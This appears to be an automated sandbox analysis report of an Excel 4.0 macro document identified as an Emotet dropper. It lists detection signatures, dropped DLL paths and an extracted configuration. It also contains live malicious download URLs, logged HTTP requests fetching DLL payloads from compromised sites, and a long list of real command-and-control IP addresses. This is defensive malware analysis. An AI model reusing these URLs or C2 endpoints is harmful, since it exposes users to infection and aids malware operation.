Windows Analysis Report
Bericht 6581.xls

Overview

General Information

Sample Name: Bericht 6581.xls
Analysis ID: 667161
MD5: 349779ed9b68f3fc148e8d81a5fa1c2a
SHA1: b940cabd8846120f3c383edac2ee817f280552c5
SHA256: b8e39a80c58b7bfe21d4a9cc695128aa1b3066e3f85a2138fcacdc4fd96403a2
Tags: xls

Detection

Hidden Macro 4.0, Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Office process drops PE file
Found Excel 4.0 Macro with suspicious formulas
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Registers a DLL
Drops PE files to the user directory
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

Source: Bericht 6581.xls Metadefender: Detection: 34%
Source: Bericht 6581.xls ReversingLabs: Detection: 46%
Source: https://atperson.com/campusvirtual/EOgFGo17w/ Avira URL Cloud: Label: malware
Source: https://174.138.33.49:7080/$ Avira URL Cloud: Label: malware
Source: https://js.cofounderspecials.com/splash.js?v=1.1.1 Avira URL Cloud: Label: malware
Source: https://174.138.33.49:7080/( Avira URL Cloud: Label: malware
Source: http://atici.net/c/JDFDBMIz/ Avira URL Cloud: Label: malware
Source: atperson.com Virustotal: Detection: 12%
Source: atici.net Virustotal: Detection: 13%
Source: eliteturismo.com Virustotal: Detection: 11%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\I7IggNeBzEXeF5[1].dll Metadefender: Detection: 54%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\I7IggNeBzEXeF5[1].dll ReversingLabs: Detection: 88%
Source: C:\Users\user\soci4.ocx Metadefender: Detection: 54%
Source: C:\Users\user\soci4.ocx ReversingLabs: Detection: 88%
Source: C:\Windows\System32\NfgWijQQRQpENoq\gUYUkALTAiOgx.dll (copy) Metadefender: Detection: 54%
Source: C:\Windows\System32\NfgWijQQRQpENoq\gUYUkALTAiOgx.dll (copy) ReversingLabs: Detection: 88%
Source: 00000008.00000002.1764271448.000000000016A000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Emotet {"C2 list": ["174.138.33.49:7080", "188.165.79.151:443", "196.44.98.190:8080", "5.253.30.17:7080", "190.145.8.4:443", "54.37.228.122:443", "128.199.217.206:443", "175.126.176.79:8080", "104.248.225.227:8080", "54.37.106.167:8080", "198.199.70.22:8080", "139.59.80.108:8080", "103.85.95.4:8080", "165.232.185.110:8080", "103.224.241.74:8080", "178.62.112.199:8080", "178.238.225.252:8080", "62.171.178.147:8080", "202.134.4.210:7080", "103.71.99.57:8080", "103.41.204.169:8080", "139.196.72.155:8080", "188.225.32.231:4143", "87.106.97.83:7080", "37.44.244.177:8080", "64.227.55.231:8080", "93.104.209.107:8080", "103.56.149.105:8080", "43.129.209.178:443", "202.29.239.162:443", "210.57.209.142:8080", "83.229.80.93:8080", "85.25.120.45:8080", "190.107.19.179:443", "157.230.99.206:8080", "195.77.239.39:8080", "36.67.23.59:443", "104.244.79.94:443", "118.98.72.86:443", "37.187.114.15:8080", "46.101.98.60:8080", "85.214.67.203:8080", "165.22.254.236:8080", "157.245.111.0:8080", "128.199.242.164:8080", "202.28.34.99:8080", "88.217.172.165:8080"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0Z74QVUQAAJA=", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCWXL4QVUQAAIg="]}
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown HTTPS traffic detected: 51.38.169.114:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800427CC _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 7_2_00000001800427CC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180042F88 FindFirstFileExW, 7_2_0000000180042F88
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180043464 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 7_2_0000000180043464
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214C9F0 FindFirstFileW,FindNextFileW, 8_2_0214C9F0

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: I7IggNeBzEXeF5[1].dll.0.dr
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\8WkzZvRZPr2gVDdMW[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\I7IggNeBzEXeF5[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Source: global traffic DNS query: name: atperson.com
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 51.38.169.114:443

Networking

Source: C:\Windows\System32\regsvr32.exe Network Connect: 174.138.33.49 7080
Source: Traffic Snort IDS: 2404316 ET CNC Feodo Tracker Reported CnC Server TCP group 9 192.168.2.22:49177 -> 174.138.33.49:7080
Source: Joe Sandbox View ASN Name: DIGITALOCEAN-ASNUS
Source: Joe Sandbox View ASN Name: OVHFR
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View IP Address: 157.230.99.206
Source: Joe Sandbox View IP Address: 188.165.79.151
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 17 Jul 2022 11:13:34 GMTServer: ApacheCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Sun, 17 Jul 2022 11:13:34 GMTContent-Disposition: attachment; filename="I7IggNeBzEXeF5.dll"Content-Transfer-Encoding: binarySet-Cookie: 62d3eede6f19e=1658056414; expires=Sun, 17-Jul-2022 11:14:34 GMT; Max-Age=60; path=/X-Content-Type-Options: nosniffUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Sun, 17 Jul 2022 11:13:34 GMTContent-Length: 850944Keep-Alive: timeout=5, max=100Content-Type: application/x-msdownload
Source: global traffic HTTP traffic detected: GET /campusvirtual/EOgFGo17w/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: atperson.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /c/JDFDBMIz/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: atici.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /libraries/nbnH9dpd/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: domesticuif.co.zaConnection: Keep-Alive
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 174.138.33.49:7080
Source: unknown Network traffic detected: IP country count 20
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49174 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 17 Jul 2022 11:09:09 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://atperson.com/wp-json/>; rel="https://api.w.org/"Vary: User-AgentConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: unknown TCP traffic detected without corresponding DNS query: 174.138.33.49
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: 77EC63BDA74BD0D0E0426DC8F80085060.8.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000008.00000002.1764380077.0000000000205000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1561207698.0000000000205000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
Source: regsvr32.exe, 00000008.00000002.1764623608.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enU
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: regsvr32.exe, 00000008.00000002.1764623608.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://174.138.33.49/
Source: regsvr32.exe, 00000008.00000002.1764623608.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://174.138.33.49:7080/$
Source: regsvr32.exe, 00000008.00000002.1764623608.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://174.138.33.49:7080/(
Source: 8WkzZvRZPr2gVDdMW[1].dll.0.dr, soci3.ocx.0.dr String found in binary or memory: https://js.cofounderspecials.com/splash.js?v=1.1.1
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: unknown DNS traffic detected: queries for: atperson.com

E-Banking Fraud

Source: Yara match File source: 7.2.regsvr32.exe.1f40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.2020000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.regsvr32.exe.1f40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.2020000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.1764450272.0000000002020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1494028683.0000000001F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1764515187.0000000002131000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1494505422.0000000002141000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: Screenshot number: 4 Screenshot OCR: Enable Editing and click Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
Source: Screenshot number: 4 Screenshot OCR: Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
Source: Bericht 6581.xls Macro extractor: Sheet: Sheet7 contains: URLDownloadToFileA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\I7IggNeBzEXeF5[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\soci4.ocx
Source: Bericht 6581.xls Initial sample: EXEC
Source: Bericht 6581.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\Bericht 6581.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\system32\NfgWijQQRQpENoq\
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018002D680 7_2_000000018002D680
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_003B0000 8_2_003B0000
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214A804 8_2_0214A804
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214A408 8_2_0214A408
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02157E28 8_2_02157E28
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214406C 8_2_0214406C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02153894 8_2_02153894
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02137CAC 8_2_02137CAC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214C8C0 8_2_0214C8C0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02146110 8_2_02146110
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02135B18 8_2_02135B18
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0215A304 8_2_0215A304
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02148B3C 8_2_02148B3C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02152F3C 8_2_02152F3C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214BD64 8_2_0214BD64
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02131368 8_2_02131368
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02144368 8_2_02144368
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021341A8 8_2_021341A8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214C9F0 8_2_0214C9F0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02147FEC 8_2_02147FEC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02147414 8_2_02147414
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02143210 8_2_02143210
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02143610 8_2_02143610
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02131014 8_2_02131014
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214F61C 8_2_0214F61C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02146418 8_2_02146418
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02143E18 8_2_02143E18
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02152E04 8_2_02152E04
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213BC08 8_2_0213BC08
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02147C30 8_2_02147C30
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02155E30 8_2_02155E30
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214F238 8_2_0214F238
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02152638 8_2_02152638
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02132820 8_2_02132820
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214D620 8_2_0214D620
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02154020 8_2_02154020
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214762C 8_2_0214762C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214B028 8_2_0214B028
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214D254 8_2_0214D254
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213F850 8_2_0213F850
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02145C50 8_2_02145C50
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213E254 8_2_0213E254
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214EE5C 8_2_0214EE5C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213FE58 8_2_0213FE58
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213C458 8_2_0213C458
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02159A40 8_2_02159A40
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214484C 8_2_0214484C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0215344C 8_2_0215344C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02134848 8_2_02134848
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02152C48 8_2_02152C48
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214FC70 8_2_0214FC70
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02134078 8_2_02134078
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02134C64 8_2_02134C64
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02140C68 8_2_02140C68
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02150C68 8_2_02150C68
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213F290 8_2_0213F290
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0215BE90 8_2_0215BE90
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0215369C 8_2_0215369C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02136698 8_2_02136698
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213B698 8_2_0213B698
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02133A9C 8_2_02133A9C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02140680 8_2_02140680
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02135484 8_2_02135484
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0215A088 8_2_0215A088
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021446B4 8_2_021446B4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0215B6BC 8_2_0215B6BC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021330BC 8_2_021330BC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213B2BC 8_2_0213B2BC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021576A4 8_2_021576A4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021414A0 8_2_021414A0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214E4A8 8_2_0214E4A8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021516A8 8_2_021516A8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213FAD0 8_2_0213FAD0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214D4D0 8_2_0214D4D0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021390D4 8_2_021390D4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021584DC 8_2_021584DC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021478C4 8_2_021478C4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02150AC4 8_2_02150AC4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02149EC0 8_2_02149EC0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213CCC8 8_2_0213CCC8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02154EF4 8_2_02154EF4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021512FC 8_2_021512FC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02152AFC 8_2_02152AFC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213B0F8 8_2_0213B0F8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021424E4 8_2_021424E4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021336E0 8_2_021336E0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021372E0 8_2_021372E0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02138CE0 8_2_02138CE0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02151AE0 8_2_02151AE0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02132AE4 8_2_02132AE4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214ACEC 8_2_0214ACEC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0215B0EC 8_2_0215B0EC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02133CE8 8_2_02133CE8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02158EE8 8_2_02158EE8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02143D1C 8_2_02143D1C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02154918 8_2_02154918
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02153304 8_2_02153304
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213D300 8_2_0213D300
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02132708 8_2_02132708
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214EB08 8_2_0214EB08
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214A130 8_2_0214A130
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02154330 8_2_02154330
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0215093C 8_2_0215093C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02156F3C 8_2_02156F3C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02143724 8_2_02143724
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02147B24 8_2_02147B24
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214C720 8_2_0214C720
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02149720 8_2_02149720
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0215BD20 8_2_0215BD20
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02156520 8_2_02156520
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213BD24 8_2_0213BD24
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02151D2C 8_2_02151D2C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0215632C 8_2_0215632C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02158B28 8_2_02158B28
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213D92C 8_2_0213D92C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02149D5C 8_2_02149D5C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0215155C 8_2_0215155C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214B558 8_2_0214B558
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02138F5C 8_2_02138F5C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02147144 8_2_02147144
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02133F40 8_2_02133F40
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02156B40 8_2_02156B40
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02134948 8_2_02134948
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0215B570 8_2_0215B570
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213DB74 8_2_0213DB74
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02146978 8_2_02146978
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02140578 8_2_02140578
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214F764 8_2_0214F764
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02140B60 8_2_02140B60
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0215796C 8_2_0215796C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213CB6C 8_2_0213CB6C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02142F94 8_2_02142F94
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02144594 8_2_02144594
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02146594 8_2_02146594
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02158990 8_2_02158990
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02135198 8_2_02135198
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213F580 8_2_0213F580
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0213ED84 8_2_0213ED84
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02141B88 8_2_02141B88
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02143BB4 8_2_02143BB4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02147DB0 8_2_02147DB0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_02137BB4 8_2_02137BB4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_021429BC 8_2_021429BC
